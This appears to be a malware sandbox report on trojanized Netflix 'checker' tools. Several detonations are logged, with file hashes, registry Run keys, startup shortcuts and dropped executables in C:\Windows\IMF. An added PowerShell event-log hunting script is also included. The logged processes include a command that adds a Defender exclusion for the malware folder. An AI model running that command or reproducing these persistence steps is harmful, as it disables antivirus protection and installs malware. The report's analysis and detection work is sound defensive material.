memory/4848-136-0x0000000005150000-0x000000000515A000-memory.dmp
memory/4848-137-0x0000000005230000-0x0000000005240000-memory.dmp
memory/4848-138-0x0000000006890000-0x000000000690E000-memory.dmp
memory/4848-139-0x0000000005230000-0x0000000005240000-memory.dmp
memory/1076-140-0x0000000002F40000-0x0000000002F76000-memory.dmp
memory/1076-141-0x00000000059D0000-0x0000000005FF8000-memory.dmp
memory/1076-142-0x00000000059A0000-0x00000000059C2000-memory.dmp
memory/1076-144-0x0000000005390000-0x00000000053A0000-memory.dmp
memory/1076-143-0x0000000006170000-0x00000000061D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ibfsy5xe.brx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1076-151-0x0000000006250000-0x00000000062B6000-memory.dmp
memory/1076-150-0x0000000005390000-0x00000000053A0000-memory.dmp
memory/1076-156-0x0000000006860000-0x000000000687E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4848-178-0x0000000006470000-0x00000000064E6000-memory.dmp
memory/4848-179-0x0000000006450000-0x000000000646E000-memory.dmp
memory/2488-194-0x00000000002E0000-0x00000000002F2000-memory.dmp
memory/1076-195-0x0000000007A00000-0x0000000007A32000-memory.dmp
memory/1076-196-0x000000006FA10000-0x000000006FA5C000-memory.dmp
memory/1076-206-0x0000000006E10000-0x0000000006E2E000-memory.dmp
memory/1076-208-0x000000007FBE0000-0x000000007FBF0000-memory.dmp
memory/2488-207-0x0000000004CA0000-0x0000000004CB0000-memory.dmp
memory/1076-209-0x00000000081B0000-0x000000000882A000-memory.dmp
memory/1076-210-0x0000000007B70000-0x0000000007B8A000-memory.dmp
memory/4144-214-0x0000000000EC0000-0x0000000000ED2000-memory.dmp
memory/1076-216-0x0000000007BE0000-0x0000000007BEA000-memory.dmp
memory/1076-219-0x0000000007DF0000-0x0000000007E86000-memory.dmp
memory/4144-220-0x0000000005750000-0x0000000005760000-memory.dmp
memory/1076-221-0x0000000007DA0000-0x0000000007DAE000-memory.dmp
memory/1076-222-0x0000000007EB0000-0x0000000007ECA000-memory.dmp
memory/1076-223-0x0000000007E90000-0x0000000007E98000-memory.dmp
memory/2488-226-0x0000000004CA0000-0x0000000004CB0000-memory.dmp
memory/4144-227-0x0000000005750000-0x0000000005760000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
24s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
memory/660-133-0x0000000000BC0000-0x0000000000BD4000-memory.dmp
memory/660-134-0x0000000005B10000-0x00000000060B4000-memory.dmp
memory/660-135-0x0000000005450000-0x00000000054E2000-memory.dmp
memory/660-136-0x0000000005510000-0x000000000551A000-memory.dmp
memory/660-137-0x0000000005550000-0x0000000005560000-memory.dmp
memory/660-138-0x0000000006AD0000-0x0000000006B4E000-memory.dmp
memory/660-139-0x0000000005550000-0x0000000005560000-memory.dmp
memory/984-140-0x0000000002300000-0x0000000002336000-memory.dmp
memory/984-141-0x0000000004F80000-0x00000000055A8000-memory.dmp
memory/984-142-0x0000000004C50000-0x0000000004C72000-memory.dmp
memory/984-143-0x0000000004EF0000-0x0000000004F56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ok4wnty2.nyg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/984-149-0x0000000005620000-0x0000000005686000-memory.dmp
memory/984-154-0x0000000004940000-0x0000000004950000-memory.dmp
memory/984-155-0x0000000004940000-0x0000000004950000-memory.dmp
memory/984-156-0x0000000005C30000-0x0000000005C4E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/660-178-0x0000000006790000-0x0000000006806000-memory.dmp
memory/660-179-0x0000000006770000-0x000000000678E000-memory.dmp
memory/1700-194-0x0000000000FF0000-0x0000000001002000-memory.dmp
memory/984-195-0x0000000006DE0000-0x0000000006E12000-memory.dmp
memory/984-196-0x000000006FC90000-0x000000006FCDC000-memory.dmp
memory/984-206-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/1700-207-0x0000000005900000-0x0000000005910000-memory.dmp
memory/984-208-0x000000007F360000-0x000000007F370000-memory.dmp
memory/984-209-0x0000000004940000-0x0000000004950000-memory.dmp
memory/984-213-0x0000000007590000-0x0000000007C0A000-memory.dmp
memory/2140-216-0x00000000009C0000-0x00000000009D2000-memory.dmp
memory/984-215-0x0000000006F40000-0x0000000006F5A000-memory.dmp
memory/2140-219-0x0000000005290000-0x00000000052A0000-memory.dmp
memory/984-220-0x0000000006FB0000-0x0000000006FBA000-memory.dmp
memory/984-221-0x00000000071C0000-0x0000000007256000-memory.dmp
memory/984-222-0x0000000007170000-0x000000000717E000-memory.dmp
memory/984-223-0x0000000007280000-0x000000000729A000-memory.dmp
memory/984-224-0x0000000007260000-0x0000000007268000-memory.dmp
memory/1700-227-0x0000000005900000-0x0000000005910000-memory.dmp
memory/2140-228-0x0000000005290000-0x00000000052A0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
24s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Netflix Checker V3.1 by Centrix.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Netflix Checker V3.1 by Centrix.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Netflix Checker V3.1 by Centrix.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\bin.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\bin.exe"
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe
"C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe"
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
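This detonation adds two steps the earlier ones do not show: the checker copies itself to C:\Users\Admin\AppData\Roaming and the chain resolves automation.whatismyip.com, an external-IP lookup that is a common first beacon for this kind of stealer. On a host that ran one of these launchers days ago, the live-state checks may already have been cleaned up, so the following is an added example of a retrospective search of the event logs for the same behaviour; it is not part of the sandbox report. It assumes Sysmon is installed under its default log name (events 1 process create, 11 file create, 13 registry value set, 22 DNS query), that PowerShell script block logging is enabled (event 4104), and that the Defender operational log is present (event 5007, configuration change, which records new exclusion paths). Those log sources, the lookback window and the output format are all assumptions.

```powershell
# Added example (not sandbox output): retrospective search of Windows event logs for the
# behaviour recorded in this report. Assumes Sysmon with its default log name, PowerShell
# script block logging (4104) and the Defender operational log (5007); all are assumptions.

param([int]$Days = 7)
$since = (Get-Date).AddDays(-$Days)

# Flatten an event's <EventData><Data Name=...> elements into a hashtable
function Get-EventDataMap {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $map = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $map[$d.Name] = $d.'#text' }
    return $map
}

$hits = New-Object System.Collections.Generic.List[object]
function Add-Hit($Time, $Source, $Detail) {
    $hits.Add([pscustomobject]@{ Time = $Time; Source = $Source; Detail = $Detail })
}

# Sysmon: 1 = process create, 11 = file create, 13 = registry value set, 22 = DNS query
$sysmon = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 11, 13, 22; StartTime = $since }
foreach ($e in $sysmon) {
    $d = Get-EventDataMap $e
    switch ($e.Id) {
        1  { if ($d.CommandLine -match 'add-mppreference.*-exclusionpath') {
                 Add-Hit $e.TimeCreated 'Sysmon/1' "Defender exclusion from $($d.ParentImage): $($d.CommandLine)" }
             if ($d.Image -like 'C:\Windows\IMF\*') {
                 Add-Hit $e.TimeCreated 'Sysmon/1' "Process from drop dir $($d.Image) (parent $($d.ParentImage))" } }
        11 { if ($d.TargetFilename -like 'C:\Windows\IMF\*' -or
                 $d.TargetFilename -like '*\Start Menu\Programs\Startup\Microsoft Startup.lnk') {
                 Add-Hit $e.TimeCreated 'Sysmon/11' "File dropped $($d.TargetFilename) by $($d.Image)" } }
        13 { if ($d.TargetObject -like '*\CurrentVersion\Run\Runtime Explorer') {
                 Add-Hit $e.TimeCreated 'Sysmon/13' "Run value set $($d.TargetObject) = $($d.Details)" } }
        22 { if ($d.QueryName -eq 'automation.whatismyip.com') {
                 Add-Hit $e.TimeCreated 'Sysmon/22' "External-IP lookup by $($d.Image)" } }
    }
}

# PowerShell script block logging: 4104 carries the text that was executed
$ps = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since }
foreach ($e in $ps) {
    $d = Get-EventDataMap $e
    if ($d.ScriptBlockText -match 'add-mppreference\s+-exclusionpath') {
        Add-Hit $e.TimeCreated 'PowerShell/4104' $d.ScriptBlockText.Trim()
    }
}

# Defender: 5007 logs configuration changes, including a new Exclusions\Paths entry
$def = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007; StartTime = $since }
foreach ($e in $def) {
    if ($e.Message -match 'Exclusions\\Paths\\C:\\Windows\\IMF') {
        Add-Hit $e.TimeCreated 'Defender/5007' 'Exclusion path added for C:\Windows\IMF'
    }
}

$hits | Sort-Object Time | Format-Table -AutoSize -Wrap
```

The Defender 5007 event is the one source that survives even when Sysmon is not deployed and script block logging is off, because the exclusion change is written by the Defender service itself rather than by the attacker's process; if only that event is present, treat C:\Windows\IMF as compromised and go back to the host-side hunt for what is still there.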
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | automation.whatismyip.com | udp |
| N/A | 127.0.0.1:80 | N/A | tcp |
Files
memory/1632-133-0x0000000000350000-0x0000000000384000-memory.dmp
memory/1632-134-0x0000000004D80000-0x0000000004E1C000-memory.dmp
memory/1632-135-0x00000000053D0000-0x0000000005974000-memory.dmp
memory/1632-136-0x0000000004E20000-0x0000000004EB2000-memory.dmp
memory/1632-137-0x0000000004D30000-0x0000000004D3A000-memory.dmp
memory/1632-138-0x0000000005040000-0x0000000005096000-memory.dmp
memory/1632-139-0x0000000004FD0000-0x0000000004FE0000-memory.dmp
memory/2208-140-0x0000000000AD0000-0x0000000000AE4000-memory.dmp
memory/2208-141-0x00000000069F0000-0x0000000006A6E000-memory.dmp
memory/2208-142-0x00000000053A0000-0x00000000053B0000-memory.dmp
memory/2208-143-0x00000000053A0000-0x00000000053B0000-memory.dmp
memory/2668-145-0x00000000029D0000-0x0000000002A06000-memory.dmp
memory/2668-146-0x00000000055E0000-0x0000000005C08000-memory.dmp
memory/2668-147-0x0000000005430000-0x0000000005452000-memory.dmp
memory/2668-148-0x00000000054F0000-0x0000000005556000-memory.dmp
memory/2668-149-0x0000000005C80000-0x0000000005CE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p24rf2cs.wnj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2972-159-0x0000000000010000-0x0000000000026000-memory.dmp
memory/2972-160-0x000000001B450000-0x000000001B91E000-memory.dmp
memory/2972-161-0x000000001AE70000-0x000000001AF0C000-memory.dmp
memory/2668-162-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
memory/2668-163-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
memory/2972-164-0x0000000000A80000-0x0000000000A90000-memory.dmp
memory/2668-165-0x0000000006300000-0x000000000631E000-memory.dmp
memory/2972-166-0x000000001AF10000-0x000000001AF18000-memory.dmp
memory/2668-169-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2208-189-0x0000000006650000-0x00000000066C6000-memory.dmp
memory/2972-190-0x000000001DDE0000-0x000000001DE86000-memory.dmp
memory/2208-191-0x0000000006630000-0x000000000664E000-memory.dmp
memory/1736-206-0x0000000000050000-0x0000000000062000-memory.dmp
memory/2668-208-0x00000000072E0000-0x0000000007312000-memory.dmp
memory/2668-209-0x000000006F990000-0x000000006F9DC000-memory.dmp
memory/2668-219-0x00000000068B0000-0x00000000068CE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe
| MD5 | 4b34e6332bf3211d13b7f3b607fb8b80 |
| SHA1 | b895420fb0e314e2e84c16be1f15663329f24a59 |
| SHA256 | d996973a5abac35c645664dbef937ea7c2aa716108eb58916e5a57226c00cd7b |
| SHA512 | 800cbfc8fc75f3d5af157fc95f0a9ea72306dcb88084e6517319aec20760e997ed3352779e16c63da06fd820ee8af41a62433efe4fa0a856afe32f1d8d4cba50 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
Analysis: behavioral24
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
35s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
